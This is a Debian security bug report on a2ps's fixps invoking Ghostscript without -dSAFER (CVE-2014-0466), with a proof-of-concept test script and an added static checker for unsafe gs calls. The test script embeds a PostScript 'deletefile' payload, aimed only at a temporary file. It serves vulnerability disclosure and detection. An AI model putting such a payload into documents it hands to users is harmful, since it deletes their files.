Package: a2ps
Version: 1:4.14-1.2
Severity: grave
Tags: security

fixps does not invoke gs with -dSAFER. As a consequence, a malicious PostScript file could delete files with the privileges of the invoking user.

I have provided a test script that can be invoked as such:

  ./test-wrapper-fixps fixps

This was reported to the Debian Security Team, who assigned this CVE-2014-0466. It was also reported to upstream, who has not provided an update or issued a fixed version.

This is being reported publicly as over 45 days have elapsed and neither upstream nor the security team has requested a delay or issued an advisory.

-- System Information:
Debian Release: jessie/sid
  APT prefers unstable
  APT policy: (500, 'unstable'), (1, 'experimental')
Architecture: amd64 (x86_64)
Foreign Architectures: i386

Kernel: Linux 3.14-rc7-amd64 (SMP w/4 CPU cores)
Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash

Versions of packages a2ps depends on:
ii  file       1:5.17-1
ii  libc6      2.18-4
ii  libpaper1  1.1.24+nmu2
ii  psutils    1.17.dfsg-1

Versions of packages a2ps recommends:
ii  bzip2           1.0.6-5
ii  cups-bsd [lpr]  1.7.1-10
ii  wdiff           1.2.1-2

Versions of packages a2ps suggests:
pn  emacsen-common                       <none>
ii  ghostscript                          9.05~dfsg-8+b1
ii  groff                                1.22.2-5
pn  gv                                   <none>
pn  html2ps                              <none>
ii  imagemagick                          8:6.7.7.10+dfsg-1
pn  t1-cyrillic                          <none>
ii  texlive-binaries [texlive-base-bin]  2013.20130729.30972-2+b2

-- no debconf information

-- 
brian m. carlson / brian with sandals: Houston, Texas, US
+1 832 623 2791 | http://www.crustytoothpaste.net/~bmc | My opinion only
OpenPGP: RSA v4 4096b: 88AC E9B2 9196 305B A994 7552 F1BA 225C 0223 B187

#!/bin/sh
# test-wrapper: test if a program is running gs without -dSAFER
#
# Usage: test-wrapper program --option --option2

TEMPDIR=`mktemp -d`
[ -n "$TEMPDIR" ] || exit 1

touch "$TEMPDIR/remove-me"

groff -Tps <<EOM | sed -e '/%%Pages/d' >"$TEMPDIR/exploit.ps"
Text
\X'ps: exec ($TEMPDIR/remove-me) deletefile'
More text.
EOM

"$@" "$TEMPDIR/exploit.ps" >/dev/null

if [ -e "$TEMPDIR/remove-me" ]
then
	printf "Program is not vulnerable.\n"
else
	printf "Program is VULNERABLE!\n"
fi

rm -r -- "$TEMPDIR"
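
An added example, not part of the bug report or of a2ps: a static check that complements the dynamic test script above by flagging shell command lines that run gs without -dSAFER. The function name audit_gs and the two sample scripts are constructed for illustration, and the match is a heuristic that only recognises a literal gs command word.

```shell
#!/bin/sh
# Added example (not from the bug report): flag command lines that run
# Ghostscript without -dSAFER. Heuristic: only a literal "gs" command word
# is recognised, not gs reached through a variable or a wrapper.

# audit_gs FILE: print "LINE: text" per offending command, return 1 if any.
audit_gs() {
    awk '
        # Join backslash-continued lines so options on later lines count.
        /\\$/ { sub(/\\$/, ""); buf = buf $0; if (!start) start = NR; next }
        {
            line = buf $0; n = (start ? start : NR); buf = ""; start = 0
            code = line
            sub(/^[ \t]*#.*/, "", code)   # skip whole-line comments
            gsub("/", " ", code)          # so /usr/bin/gs ends in the word gs
            if (code ~ /(^|[ \t;|&(`])gs([ \t]|$)/ && code !~ /-dSAFER/) {
                printf "%d: %s\n", n, line
                bad = 1
            }
        }
        END { exit bad }
    ' "$1"
}

# Constructed sample scripts (assumptions for the demo, not a2ps code).
demo_dir=$(mktemp -d) || exit 1
cat >"$demo_dir/unsafe.sh" <<'EOF'
#!/bin/sh
# gs is called below
gs -q -dNOPAUSE -dBATCH \
   -sOutputFile=out.ps "$1"
EOF
cat >"$demo_dir/safe.sh" <<'EOF'
#!/bin/sh
/usr/bin/gs -q -dNOPAUSE -dBATCH \
   -dSAFER -sOutputFile=out.ps "$1"
EOF

for f in "$demo_dir/unsafe.sh" "$demo_dir/safe.sh"; do
    if audit_gs "$f"; then echo "$f: ok"; else echo "$f: gs without -dSAFER"; fi
done
rm -r -- "$demo_dir"
```

A clean result from this check does not prove safety; the test script above remains the authoritative behavioural check.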